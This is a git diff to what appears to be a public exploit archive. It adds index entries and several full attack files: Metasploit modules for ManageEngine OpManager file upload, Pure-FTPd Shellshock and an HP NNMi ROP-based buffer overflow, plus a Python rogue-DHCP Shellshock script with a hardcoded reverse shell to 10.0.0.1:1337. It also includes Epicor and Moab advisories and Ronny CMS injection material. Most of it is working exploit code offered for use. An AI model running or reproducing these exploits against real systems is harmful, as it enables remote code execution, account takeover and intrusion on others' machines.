diff --git a/files.csv b/files.csv index da5d359a3..4e8b2d94a 100755 --- a/files.csv +++ b/files.csv @@ -31367,3 +31367,29 @@ id,file,description,date,author,platform,type,port 34836,platforms/windows/remote/34836.py,"Notepad++ 5.8.2 'libtidy.dll' DLL Loading Arbitrary Code Execution Vulnerability",2010-10-12,anT!-Tr0J4n,windows,remote,0 34837,platforms/php/webapps/34837.txt,"Joomla! 'com_jstore' Component 'controller' Parameter Local File Include Vulnerability",2010-10-13,jos_ali_joe,php,webapps,0 34838,platforms/windows/remote/34838.c,"Torrent DVD Creator 'quserex.dll' DLL Loading Arbitrary Code Execution Vulnerability",2010-10-13,anT!-Tr0J4n,windows,remote,0 +34840,platforms/php/webapps/34840.txt,"Ronny CMS 1.1 r935 Multiple HTML Injection Vulnerabilities",2010-10-13,"High-Tech Bridge SA",php,webapps,0 +34841,platforms/php/webapps/34841.txt,"PluXml 5.0.1 Multiple Cross Site Scripting and HTML Injection Vulnerabilities",2010-10-13,"High-Tech Bridge SA",php,webapps,0 +34842,platforms/php/webapps/34842.txt,"TWiki <= 5.0 bin/view rev Parameter XSS",2010-10-14,"DOUHINE Davy",php,webapps,0 +34843,platforms/php/webapps/34843.txt,"TWiki <= 5.0 bin/login Multiple Parameter XSS",2010-10-14,"DOUHINE Davy",php,webapps,0 +34844,platforms/windows/remote/34844.c,"STDU Explorer 1.0.201 'dwmapi.dll' DLL Loading Arbitrary Code Execution Vulnerability",2010-10-15,anT!-Tr0J4n,windows,remote,0 +34845,platforms/php/webapps/34845.txt,"PHP Photo Vote 1.3F 'page' Parameter Cross Site Scripting Vulnerability",2009-08-07,Moudi,php,webapps,0 +34846,platforms/windows/remote/34846.txt,"httpdx 1.4.5 dot Character Remote File Disclosure Vulnerability",2009-10-09,Dr_IDE,windows,remote,0 +34847,platforms/php/webapps/34847.txt,"PHP Easy Shopping Cart 3.1R 'subitems.php' Cross Site Scripting Vulnerability",2009-08-07,Moudi,php,webapps,0 +34848,platforms/windows/remote/34848.c,"1CLICK DVD Converter 2.1.7.1 Multiple DLL Loading Arbitrary Code Execution Vulnerabilities",2010-10-15,anT!-Tr0J4n,windows,remote,0 +34849,platforms/php/webapps/34849.txt,"AdvertisementManager 3.1 'req' Parameter Local and Remote File Include Vulnerabilities",2010-01-19,indoushka,php,webapps,0 +34850,platforms/php/webapps/34850.txt,"eXV2 CMS Multiple Cross Site Scripting Vulnerabilities",2010-10-15,LiquidWorm,php,webapps,0 +34852,platforms/php/webapps/34852.txt,"HTTP File Server 2.3a, 2.3b, 2.3c - Remote Command Execution",2014-10-02,"Daniele Linguaglossa",php,webapps,80 +34853,platforms/windows/remote/34853.c,"PowerDVD 5.0.1107 'trigger.dll' DLL Loading Arbitrary Code Execution Vulnerability",2010-10-19,"Inj3cti0n P4ck3t",windows,remote,0 +34854,platforms/php/webapps/34854.txt,"All In One Wordpress Firewall 3.8.3 - Persistent XSS Vulnerability",2014-10-02,Vulnerability-Lab,php,webapps,80 +34855,platforms/windows/dos/34855.pl,"ALPHA Player 2.4 '.bmp' File Buffer Overflow Vulnerability",2010-10-19,anT!-Tr0J4n,windows,dos,0 +34856,platforms/windows/remote/34856.py,"Kolibri Webserver 2.0 Buffer Overflow with EMET 5.0 and EMET 4.1 Partial Bypass",2014-10-02,tekwizz123,windows,remote,80 +34857,platforms/windows/dos/34857.txt,"TeamSpeak Client 3.0.14 - Buffer Overflow Vulnerability",2014-10-02,"SpyEye and Christian Galeon",windows,dos,0 +34858,platforms/php/webapps/34858.txt,"RBS Change Complet Open Source 3.6.8 - CSRF Vulnerability",2014-10-02,"Krusty Hack",php,webapps,80 +34860,platforms/linux/remote/34860.py,"GNU bash 4.3.11 Environment Variable dhclient Exploit",2014-10-02,@0x00string,linux,remote,0 +34861,platforms/php/webapps/34861.txt,"PHPCompta/NOALYSS 6.7.1 5638 - Remote Command Execution",2014-10-02,Portcullis,php,webapps,80 +34862,platforms/linux/remote/34862.rb,"Pure-FTPd External Authentication Bash Environment Variable Code Injection",2014-10-02,metasploit,linux,remote,21 +34863,platforms/php/webapps/34863.txt,"TestLink 1.9.11 - Multiple SQL Injection Vulnerabilities",2014-10-02,Portcullis,php,webapps,80 +34864,platforms/asp/webapps/34864.txt,"Epicor Enterprise 7.4 - Multiple Vulnerabilities",2014-10-02,"Fara Rustein",asp,webapps,443 +34865,platforms/multiple/webapps/34865.txt,"Moab < 7.2.9 - Authorization Bypass",2014-10-02,"MWR InfoSecurity",multiple,webapps,0 +34866,platforms/linux/remote/34866.rb,"HP Network Node Manager I PMD Buffer Overflow",2014-10-02,metasploit,linux,remote,7426 +34867,platforms/java/remote/34867.rb,"ManageEngine OpManager / Social IT Arbitrary File Upload",2014-10-02,"Pedro Ribeiro",java,remote,80 diff --git a/platforms/asp/webapps/34864.txt b/platforms/asp/webapps/34864.txt new file mode 100755 index 000000000..39367268f --- /dev/null +++ b/platforms/asp/webapps/34864.txt @@ -0,0 +1,72 @@ +"Epicor Enterprise vulnerabilities" + +- Affected vendor: Epicor Software Corporation +- Affected system: Epicor Enterprise - Version 7.4 +- Vendor disclosure date: May 13th, 2014 +- Public disclosure date: September 30th, 2014 +- Status: Fixed + +- Associated CVEs: + + 1) CVE-2014-4311 + Password values not masked appropriately: + Even though the application appears to be masking the affected password values +in the database connection and email settings page, it is possible to access +their content by observing the HTML code. + + Affected password values: + - “Database Connection” + - “E-mail Connection” + + Associated CAPEC: + CAPEC-167: Lifting Sensitive Data from the Client - +https://capec.mitre.org/data/definitions/167.html + + Associated CWE: + CWE-200: Information Exposure - http://cwe.mitre.org/data/definitions/200.html + + 2) CVE-2014-4312 + Persistent and reflective cross-site scripting (XSS) attacks possible: + The identified website is vulnerable to persistent and reflective cross-site +scripting. Script injection is a weakness within an application, and is due to +insufficient validation of the input data (i.e. input data being sent from the +user/presentation layer) and output encoding allowing dynamic execution of +scripts on the application front end resulting in anomalous/abnormal behaviour +of the application. + + Example of affected functionalities for persistent XSS: + - 1. While viewing Order details, and injecting a malicious payload on the +"Notes" section. + - 2. While modifying an “Order to consume” and injecting a malicious payload +on the "Description" section. + - 3. While observing the “Favorites” section and and injecting a malicious +payload on the “Favorites name” section. + Example of an injected payload: + + Example of affected URLs for reflective XSS: + - 1. +https://XXXXX/Procurement/EKPHTML/search_item_bt.asp?RecordsRequested=Yes&FiltPartNo=&FiltSupplier=-1&FiltKeyword= + - 2. +https://XXXXX/Procurement/EKPHTML/EnterpriseManager/Budget/ImportBudget_fr.asp?Act=dtt"> + - 3. https://XXXXX +/Procurement/EKPHTML/EnterpriseManager/UserSearchDlg.asp?hdnPageName=UserSearch&hdnOpenerFormName=PrefApp&hdnApproverFieldName=temp1&hdnApproverIDFieldName=temp2&hdnUserID=200&hdnOpener=Test"> + - 4. +https://XXXXX/Procurement/EKPHTML/EnterpriseManager/UserSearchDlg.asp?hdnOpenerFormName=PrefApp&hdnApproverFieldName="> + - 5. +https://XXXXX/Procurement/EKPHTML/EnterpriseManager/Codes.asp?INTEGRATED=XSS">--> + + Associated CAPEC: + CAPEC-32: Embedding Scripts in HTTP Query Strings - +https://capec.mitre.org/data/definitions/32.html + + Associated CWE: + CWE-79: Improper Neutralization of Input During Web Page Generation +('Cross-site Scripting') - http://cwe.mitre.org/data/definitions/79.html + +- Available fix: + Epicor Enterprise Hotfix: FS74SP6_HotfixTL054181 + +- Credit: + These vulnerabilities were discovered by Fara Rustein. + If you have any questions, comments, concerns, updates or suggestions please +contact Fara Rustein (TW: @fararustein). \ No newline at end of file diff --git a/platforms/java/remote/34867.rb b/platforms/java/remote/34867.rb new file mode 100755 index 000000000..7256dabc3 --- /dev/null +++ b/platforms/java/remote/34867.rb @@ -0,0 +1,154 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::FileDropper + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'ManageEngine OpManager / Social IT Arbitrary File Upload', + 'Description' => %q{ + This module exploits a file upload vulnerability in ManageEngine OpManager and Social IT. + The vulnerability exists in the FileCollector servlet which accepts unauthenticated + file uploads. This module has been tested successfully on OpManager v8.8 - v11.3 and on + version 11.0 of SocialIT for Windows and Linux. + }, + 'Author' => + [ + 'Pedro Ribeiro ', # Vulnerability Discovery and Metasploit module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'CVE', '2014-6034' ], + [ 'OSVDB', '112276' ], + [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_opmanager_socialit_it360.txt' ], + [ 'URL', 'http://seclists.org/fulldisclosure/2014/Sep/110' ] + ], + 'Privileged' => true, + 'Platform' => 'java', + 'Arch' => ARCH_JAVA, + 'Targets' => + [ + [ 'OpManager v8.8 - v11.3 / Social IT Plus 11.0 Java Universal', { } ] + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Sep 27 2014')) + + register_options( + [ + Opt::RPORT(80), + OptInt.new('SLEEP', + [true, 'Seconds to sleep while we wait for WAR deployment', 15]), + ], self.class) + end + + def check + res = send_request_cgi({ + 'uri' => normalize_uri("/servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector"), + 'method' => 'GET' + }) + + # A GET request on this servlet returns "405 Method not allowed" + if res and res.code == 405 + return Exploit::CheckCode::Detected + end + + return Exploit::CheckCode::Safe + end + + + def upload_war_and_exec(try_again, app_base) + tomcat_path = '../../../tomcat/' + servlet_path = '/servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector' + + if try_again + # We failed to obtain a shell. Either the target is not vulnerable or the Tomcat configuration + # does not allow us to deploy WARs. Fix that by uploading a new context.xml file. + # The file we are uploading has the same content apart from privileged="false" and lots of XML comments. + # After replacing the context.xml file let's upload the WAR again. + print_status("#{peer} - Replacing Tomcat context file") + send_request_cgi({ + 'uri' => normalize_uri(servlet_path), + 'method' => 'POST', + 'data' => %q{WEB-INF/web.xml}, + 'ctype' => 'application/xml', + 'vars_get' => { + 'regionID' => tomcat_path + "conf", + 'FILENAME' => "context.xml" + } + }) + else + # We need to create the upload directories before our first attempt to upload the WAR. + print_status("#{peer} - Creating upload directories") + bogus_file = rand_text_alphanumeric(4 + rand(32 - 4)) + send_request_cgi({ + 'uri' => normalize_uri(servlet_path), + 'method' => 'POST', + 'data' => rand_text_alphanumeric(4 + rand(32 - 4)), + 'ctype' => 'application/xml', + 'vars_get' => { + 'regionID' => "", + 'FILENAME' => bogus_file + } + }) + register_files_for_cleanup("state/archivedata/zip/" + bogus_file) + end + + war_payload = payload.encoded_war({ :app_name => app_base }).to_s + + print_status("#{peer} - Uploading WAR file...") + res = send_request_cgi({ + 'uri' => normalize_uri(servlet_path), + 'method' => 'POST', + 'data' => war_payload, + 'ctype' => 'application/octet-stream', + 'vars_get' => { + 'regionID' => tomcat_path + "webapps", + 'FILENAME' => app_base + ".war" + } + }) + + # The server either returns a 500 error or a 200 OK when the upload is successful. + if res and (res.code == 500 or res.code == 200) + print_status("#{peer} - Upload appears to have been successful, waiting " + datastore['SLEEP'].to_s + + " seconds for deployment") + sleep(datastore['SLEEP']) + else + fail_with(Exploit::Failure::Unknown, "#{peer} - WAR upload failed") + end + + print_status("#{peer} - Executing payload, wait for session...") + send_request_cgi({ + 'uri' => normalize_uri(app_base, Rex::Text.rand_text_alpha(rand(8)+8)), + 'method' => 'GET' + }) + end + + + def exploit + app_base = rand_text_alphanumeric(4 + rand(32 - 4)) + + upload_war_and_exec(false, app_base) + register_files_for_cleanup("tomcat/webapps/" + "#{app_base}.war") + + sleep_counter = 0 + while not session_created? + if sleep_counter == datastore['SLEEP'] + print_error("#{peer} - Failed to get a shell, let's try one more time") + upload_war_and_exec(true, app_base) + return + end + + sleep(1) + sleep_counter += 1 + end + end +end \ No newline at end of file diff --git a/platforms/linux/remote/34860.py b/platforms/linux/remote/34860.py new file mode 100755 index 000000000..ff25e8c04 --- /dev/null +++ b/platforms/linux/remote/34860.py @@ -0,0 +1,74 @@ +#!/usr/bin/python +# Exploit Title: dhclient shellshocker +# Google Dork: n/a +# Date: 10/1/14 +# Exploit Author: @0x00string +# Vendor Homepage: gnu.org +# Software Link: http://ftp.gnu.org/gnu/bash/bash-4.3.tar.gz +# Version: 4.3.11 +# Tested on: Ubuntu 14.04.1 +# CVE : CVE-2014-6277,CVE-2014-6278,CVE-2014-7169,CVE-2014-7186,CVE-2014-7187 +# ______ ______ ______ _ +# / __ | / __ |/ __ | _ (_) +#| | //| |_ _| | //| | | //| | ___| |_ ____ _ ____ ____ ___ +#| |// | ( \ / ) |// | | |// | |/___) _) / ___) | _ \ / _ |/___) +#| /__| |) X (| /__| | /__| |___ | |__| | | | | | ( ( | |___ | +# \_____/(_/ \_)\_____/ \_____/(___/ \___)_| |_|_| |_|\_|| (___/ +# (_____| +# _ _ _ _ +# | | | | (_) _ +# _ | | | _ ____| |_ ____ ____ | |_ +# / || | || \ / ___) | |/ _ ) _ \| _) +#( (_| | | | ( (___| | ( (/ /| | | | |__ +# \____|_| |_|\____)_|_|\____)_| |_|\___) +# +# _ _ _ _ _ +# | | | | | | | | | +# ___| | _ ____| | | ___| | _ ___ ____| | _ ____ ____ +# /___) || \ / _ ) | |/___) || \ / _ \ / ___) | / ) _ )/ ___) +#|___ | | | ( (/ /| | |___ | | | | |_| ( (___| |< ( (/ /| | +#(___/|_| |_|\____)_|_(___/|_| |_|\___/ \____)_| \_)____)_| + +# this buddy listens for clients performing a DISCOVER, a later version will exploit periodic REQUESTs, which can sometimes be prompted by causing IP conflicts +# once a broadcast DISCOVER packet has been detected, the XID, MAC and requested IP are pulled from the pack and a corresponding OFFER and ACK are generated and pushed out +# The client is expected to reject the offer in preference of their known DHCP server, but will still process the packet, triggering the vulnerability. +# can use option 114, 56 or 61, though is hardcoded to use 114 as this is merely a quick and dirty example. + +import socket, struct +def HexToByte( hexStr ): + b = [] + h = ''.join( h.split(" ") ) + for i in range(0, len(h), 2): + b.append( chr( int (h[i:i+2], 16 ) ) ) + return ''.join( b ) + +rport = 68 +lport = 67 + +bsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) +sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + +bsock.bind(("", lport)) + +while True: + + OP = "72" # 56, Message - RFC 1533,2132. 61, Client-identifier - RFC 1533,2132,4361 or 114, URL - RFC 3679 are currently known to work, here we use 114 + URL = "() { :;}; bash -i >& /dev/tcp/10.0.0.1/1337 0>&1".encode("hex") + URLLEN = chr(len(URL) / 2).encode("hex") + END = "03040a000001ff" + broadcast_get, (bcrhost, rport) = bsock.recvfrom(2048) + hexip = broadcast_get[245:249] + rhost = str(ord(hexip[0])) + "." + str(ord(hexip[1])) + "." + str(ord(hexip[2])) + "." + str(ord(hexip[3])) + XID = broadcast_get[4:8].encode("hex") + chaddr = broadcast_get[29:34].encode("hex") + print "[+]\tgot broadcast with XID " + XID + " requesting IP " + rhost + "\n" + OFFER = "02010600" + XID + "00000000000000000a0000430a0000010000000000" + chaddr + "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000006382536335010236040a000001330400000e103a04000007083b0400000c4e0104ffffff001c040a0000ff06040a0000010f034c4f4c0c076578616d706c65" + OP + URLLEN + URL + END + OFFER_BYTES = HexToByte(OFFER) + ACK = "02010600" + XID + "00000000000000000a0000430a0000010000000000" + chaddr + "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000006382536335010536040a000001330400000e103a04000007083b0400000c4e0104ffffff001c040a0000ff06040a0000010f034c4f4c0c076578616d706c65" + OP + URLLEN + URL + END + ACK_BYTES = HexToByte(ACK) + print "[+]\tsending evil offer\n" + sock.sendto(OFFER_BYTES, (rhost, rport)) + broadcast_get2 = bsock.recvfrom(2048) + print "[+]\tassuming request was received, sending ACK\n" + sock.sendto(ACK_BYTES, (rhost, rport)) + diff --git a/platforms/linux/remote/34862.rb b/platforms/linux/remote/34862.rb new file mode 100755 index 000000000..e41879a6b --- /dev/null +++ b/platforms/linux/remote/34862.rb @@ -0,0 +1,116 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit4 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::Ftp + include Msf::Exploit::CmdStager + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Pure-FTPd External Authentication Bash Environment Variable Code Injection', + 'Description' => %q( + This module exploits the code injection flaw known as shellshock which + leverages specially crafted environment variables in Bash. This exploit + specifically targets Pure-FTPd when configured to use an external + program for authentication. + ), + 'Author' => + [ + 'Stephane Chazelas', # Vulnerability discovery + 'Frank Denis', # Discovery of Pure-FTPd attack vector + 'Spencer McIntyre' # Metasploit module + ], + 'References' => + [ + ['CVE', '2014-6271'], + ['OSVDB', '112004'], + ['EDB', '34765'], + ['URL', 'https://gist.github.com/jedisct1/88c62ee34e6fa92c31dc'] + ], + 'Payload' => + { + 'DisableNops' => true, + 'Space' => 2048 + }, + 'Targets' => + [ + [ 'Linux x86', + { + 'Platform' => 'linux', + 'Arch' => ARCH_X86, + 'CmdStagerFlavor' => :printf + } + ], + [ 'Linux x86_64', + { + 'Platform' => 'linux', + 'Arch' => ARCH_X86_64, + 'CmdStagerFlavor' => :printf + } + ] + ], + 'DefaultOptions' => + { + 'PrependFork' => true + }, + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Sep 24 2014')) + register_options( + [ + Opt::RPORT(21), + OptString.new('RPATH', [true, 'Target PATH for binaries used by the CmdStager', '/bin']) + ], self.class) + deregister_options('FTPUSER', 'FTPPASS') + end + + def check + # this check method tries to use the vulnerability to bypass the login + username = rand_text_alphanumeric(rand(20) + 1) + random_id = (rand(100) + 1) + command = "echo auth_ok:1; echo uid:#{random_id}; echo gid:#{random_id}; echo dir:/tmp; echo end" + if send_command(username, command) =~ /^2\d\d ok./i + return CheckCode::Safe if banner !~ /pure-ftpd/i + disconnect + + command = "echo auth_ok:0; echo end" + if send_command(username, command) =~ /^5\d\d login authentication failed/i + return CheckCode::Vulnerable + end + end + disconnect + + CheckCode::Safe + end + + def execute_command(cmd, _opts) + cmd.gsub!('chmod', "#{datastore['RPATH']}/chmod") + username = rand_text_alphanumeric(rand(20) + 1) + send_command(username, cmd) + end + + def exploit + # Cannot use generic/shell_reverse_tcp inside an elf + # Checking before proceeds + if generate_payload_exe.blank? + fail_with(Failure::BadConfig, "#{peer} - Failed to store payload inside executable, please select a native payload") + end + + execute_cmdstager(linemax: 500) + handler + end + + def send_command(username, cmd) + cmd = "() { :;}; #{datastore['RPATH']}/sh -c \"#{cmd}\"" + connect + send_user(username) + password_result = send_pass(cmd) + disconnect + password_result + end +end \ No newline at end of file diff --git a/platforms/linux/remote/34866.rb b/platforms/linux/remote/34866.rb new file mode 100755 index 000000000..5af7a53a0 --- /dev/null +++ b/platforms/linux/remote/34866.rb @@ -0,0 +1,229 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::Remote::Udp + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'HP Network Node Manager I PMD Buffer Overflow', + 'Description' => %q{ + This module exploits a stack buffer overflow in HP Network Node Manager I (NNMi). The + vulnerability exists in the pmd service, due to the insecure usage of functions like + strcpy and strcat while handling stack_option packets with user controlled data. In + order to bypass ASLR this module uses a proto_tbl packet to leak an libov pointer from + the stack and finally build the rop chain to avoid NX. + }, + 'Author' => + [ + 'd(-_-)b', # Vulnerability discovery + 'juan vazquez' # Metasploit module + ], + 'References' => + [ + ['CVE', '2014-2624'], + ['ZDI', '14-305'] + ], + 'Payload' => + { + 'BadChars' => "\x00", + 'Space' => 3000, + 'DisableNops' => true, + 'Compat' => + { + 'PayloadType' => 'cmd cmd_bash', + 'RequiredCmd' => 'generic python perl openssl bash-tcp gawk' + } + }, + 'Arch' => ARCH_CMD, + 'Platform' => 'unix', + 'Targets' => + [ + ['Automatic', {}], + ['HP NNMi 9.10 / CentOS 5', + { + # ptr to .rodata with format specifier + #.rodata:0003BE86 aS_1 db '%s',0 + 'ov_offset' => 0x3BE86, + :rop => :rop_hp_nnmi_9_10 + } + ], + ['HP NNMi 9.20 / CentOS 6', + { + # ptr to .rodata with format specifier + #.rodata:0003C2D6 aS_1 db '%s',0 + 'ov_offset' => 0x3c2d8, + :rop => :rop_hp_nnmi_9_20 + } + ] + ], + 'Privileged' => false, # true for HP NNMi 9.10, false for HP NNMi 9.20 + 'DisclosureDate' => 'Sep 09 2014', + 'DefaultTarget' => 0 + )) + + register_options([ Opt::RPORT(7426) ], self.class) + end + + def check + header = [ + 0x2a5, # pmdmgr_init pkt + 0x3cc, # signature + 0xa0c, # signature + 0xca8 # signature + ].pack("V") + + data = "\x00" * (0xfa4 - header.length) + + pkt = header + data + + connect_udp + udp_sock.put(pkt) + res = udp_sock.timed_read(8, 1) + if res.blank? + # To mitigate MacOSX udp sockets behavior + # see https://dev.metasploit.com/redmine/issues/7480 + udp_sock.put(pkt) + res = udp_sock.timed_read(8) + end + disconnect_udp + + if res.blank? + return Exploit::CheckCode::Unknown + elsif res.length == 8 && res.unpack("V").first == 0x2a5 + return Exploit::CheckCode::Detected + else + return Exploit::CheckCode::Unknown + end + end + + def exploit + connect_udp + # info leak with a "proto_tbl" packet + print_status("Sending a 'proto_tbl' request...") + udp_sock.put(proto_tbl_pkt) + + res = udp_sock.timed_read(13964, 1) + if res.blank? + # To mitigate MacOSX udp sockets behavior + # see https://dev.metasploit.com/redmine/issues/7480 + udp_sock.put(proto_tbl_pkt) + res = udp_sock.timed_read(13964) + end + + if res.blank? + fail_with(Failure::Unknown, "Unable to get a 'proto_tbl' response...") + end + + if target.name == 'Automatic' + print_status("Fingerprinting target...") + my_target = auto_target(res) + fail_with(Failure::NoTarget, "Unable to autodetect target...") if my_target.nil? + else + my_target = target + fail_with(Failure::Unknown, "Unable to leak libov base address...") unless find_ov_base(my_target, res) + end + + print_good("Exploiting #{my_target.name} with libov base address at 0x#{@ov_base.to_s(16)}...") + + # exploit with a "stack_option_pkt" packet + udp_sock.put(stack_option_pkt(my_target, @ov_base)) + + disconnect_udp + end + + def rop_hp_nnmi_9_10(ov_base) + rop = rand_text_alpha(775) + rop << [0x808d7c1].pack("V") # pop ebx ; pop ebp ; ret + rop << [ov_base + 0x481A8].pack("V") # ebx: libov .got + rop << [0x8096540].pack("V") # ptr to .data where user controlled string will be stored: + # "PMD Stack option specified, but stack not available (user_controlled)" + rop << [0x808d7c2].pack("V") # pop ebp # ret + rop << [0x08096540 + 4732].pack("V") # ebp: ptr to our controlled data in .data (+0x1028 to compensate) + rop << [ov_base + 0x1D692].pack("V") # ptr to 'call _system' sequence: + #.text:0001D692 lea eax, [ebp+dest] + #.text:0001D698 push eax ; command + #.text:0001D699 call _system + rop + end + + def rop_hp_nnmi_9_20(ov_base) + rop = rand_text_alpha(775) + rop << [0x808dd70].pack("V") # pop eax ; pop ebx ; pop ebp ; ret + rop << [0xf7f61cd0 + ov_base + 0x1dae6].pack("V") # eax: ptr to 'call _system' sequence + #.text:0001DAE6 lea eax, [ebp+dest] (dest = -0x1028) + #.text:0001DAEC push eax ; command + #.text:0001DAED call _system + rop << [0x08097160].pack("V") # ebx: ptr to .data where user controlled string will be stored: + # "PMD Stack option specified, but stack not available (user_controlled)" + rop << rand_text_alpha(4) # ebp: padding + rop << [0x804fb86].pack("V") # add eax 0x809e330 ; add ecx ecx ; ret (control eax) + rop << [0x8049ac4].pack("V") # xchg eax, edi ; ret + rop << [0x808dd70].pack("V") # pop eax ; pop ebx ; pop ebp ; ret + rop << [0xf7f61cd0 + ov_base + 0x47f1c].pack("V") # eax: libov .got base + rop << rand_text_alpha(4) # ebx: padding + rop << [0x8097160 + 4764].pack("V") # ebp: ptr to our controlled data in .data (+0x1028 to compensate) + rop << [0x804fb86].pack("V") # add eax 0x809e330 ; add ecx ecx ; ret (control eax) + rop << [0x805a58d].pack("V") # xchg ebx eax ; and eax 0xc4830001 ; and cl cl ; ret (ebx: libov .got) + rop << [0x8049ac4].pack("V") # xchg eax, edi ; ret ; (eax: call to system sequence from libov) + rop << [0x80528BC].pack("V") # jmp eax + + rop + end + + def stack_option_pkt(t, ov_base) + hdr = [0x2a9].pack("V") # stack_option packet + data = "-SA" # stack name (invalid one 'A') + data << ";" # separator + data << self.send(t[:rop], ov_base) # malformed stack options + data << payload.encoded + data << ";\n" + data << "\x00" * (0xfa4 - data.length - hdr.length) + + hdr + data + end + + def proto_tbl_pkt + hdr = [0x2aa].pack("V") # proto_tbl packet + data = "\x00" * (0xfa4 - hdr.length) + + hdr + data + end + + def base(address, offset) + address - offset + end + + def find_ov_base(t, data) + print_status("Searching #{t.name} pointers...") + i = 0 + data.unpack("V*").each do |int| + if base(int, t['ov_offset']) % 0x1000 == 0 + print_status("Pointer 0x#{int.to_s(16)} found at offset #{i * 4}") + @ov_base = base(int, t['ov_offset']) + return true + end + i = i + 1 + end + + false + end + + def auto_target(data) + targets.each do |t| + next if t.name == 'Automatic' + if find_ov_base(t, data) + return t + end + end + + nil + end + +end \ No newline at end of file diff --git a/platforms/multiple/webapps/34865.txt b/platforms/multiple/webapps/34865.txt new file mode 100755 index 000000000..5b96adb07 --- /dev/null +++ b/platforms/multiple/webapps/34865.txt @@ -0,0 +1,110 @@ +##[Moab Authentication Bypass : CVE-2014-5300]## + +Software: Moab +Affected Versions: All versions prior to Moab 7.2.9 and Moab 8 +CVE Reference: CVE-2014-5300 +Author: John Fitzpatrick, MWR Labs (http://labs.mwrinfosecurity.com/) +Severity: High Risk +Vendor: Adaptive Computing +Vendor Response: Resolved in Moab 7.2.9 and Moab 8 + + +##[Description] + +It is possible to bypass authentication within Moab in order to impersonate and run commands/operations as arbitrary users. The issue is believed to affect all versions of Moab prior to versions 7.2.9 and Moab 8. + + +##[Impact] + +Successful exploitation could lead to remote code execution. + + +##[Cause] + +The Moab server does not appropriately authenticate requests. + + +##[Solution] + +Upgrade to Moab 7.2.9, Moab 8, or a later version of the software. Beta versions of Moab 8 are affected by this issue. This issue also affects versions of Moab which are using Munge for authentication. + +This issue is believed to affect all instances of Moab prior to version 7.2.9 and 8. MWR are not aware of any alternate workaround for this issue. + + +##[Technical Details] + +Moab is a workload manager used in High Performance Computing (HPC) environments. In a typical environment a user submits their jobs to the Moab server for it to handle the workload. This communication makes use of an XML based protocol, and example job submission is shown below: + + + + 7v49VzAlbyNQ4O3VChCus+v2LeE= + QG13cmxhYnMgRWFzdGVyIEVnZyE= + + + + job + + test + test + test + /home/test + 2 + /usr/bin/id + PBS + \START/usr/bin/id\0a\0a + + + + + +Contained within this message is a element, which contains both a and elements. The is simply a SHA1 sum of the element. The , however, is computed based upon a key (.moab.key) which is read by a setuid root binary (mauth) which performs some additional verification of the user before providing a signature for the message. This use of signatures is intended to prevent users from being able to craft arbitrary messages as the signature value is validated by the Moab server. Messages containing an incorrect signature for the message will be rejected. + +However, whilst an incorrect SignatureValue results in a rejected message, it was found that if no signature is supplied then the signature checks are skipped and the remainder of the message processed. As a result it is possible to craft arbitrary messages and these messages will be accepted and honoured by the server as long as the message does not include a element. + +The following message contains no signature element and therefore will be accepted by the server: + + + + + job + + test + test + test + /home/test + 2 + + /usr/bin/id + PBS + \START/usr/bin/id\0a\0a + + + + + +With no signing taking place an adversary can specify arbitrary users for these operations to be performed under, and thus impersonate other users including executing jobs as other users. + + +##[Proof of Concept] + +In addition to job submission Moab also provides the ability to dynamically reconfigure the Moab server remotely. Whilst a default Moab installation will not permit the submission of root jobs it is possible to exploit this vulnerability in order to dynamically reconfigure Moab to allow root job submissions. The following request achieves this and due to its simple nature makes a useful proof of concept (the timestamp value may require altering): + +00000238 +sched + +Sending the entire message above (including the size value) will enable root jobs on a vulnerable server. + + +##[Detailed Timeline] + +2014-07-08 : Vulnerability identified and detailed information passed to Adaptive +2014-07-09 : Adaptive inform MWR that code changes are being made to address the issue +2014-07-11 : Adaptive inform MWR that regression testing has identified an additional issue +2014-07-14 : Moab 8 released +2014-08-20 : Limited status update provided by Adaptive suggesting a 7.2 fix will emerge +2014-09-08 : Release of advisory to HPC community +2014-09-16 : Moab 7.2.9 released +2014-09-25 : Public release of advisory + + +http://labs.mwrinfosecurity.com \ No newline at end of file diff --git a/platforms/php/webapps/34840.txt b/platforms/php/webapps/34840.txt new file mode 100755 index 000000000..4ec3fc840 --- /dev/null +++ b/platforms/php/webapps/34840.txt @@ -0,0 +1,70 @@ +source: http://www.securityfocus.com/bid/44066/info + +Ronny CMS is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content. + +Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible. + +Ronny CMS 1.1 r935 is vulnerable; other versions may also be affected. + +
+ + + + + + + + + + + + + + + +
+ + + + + + +
+ + + + + + + + +
+ + + + + + +
+ + + + + + + + + + + + + + +
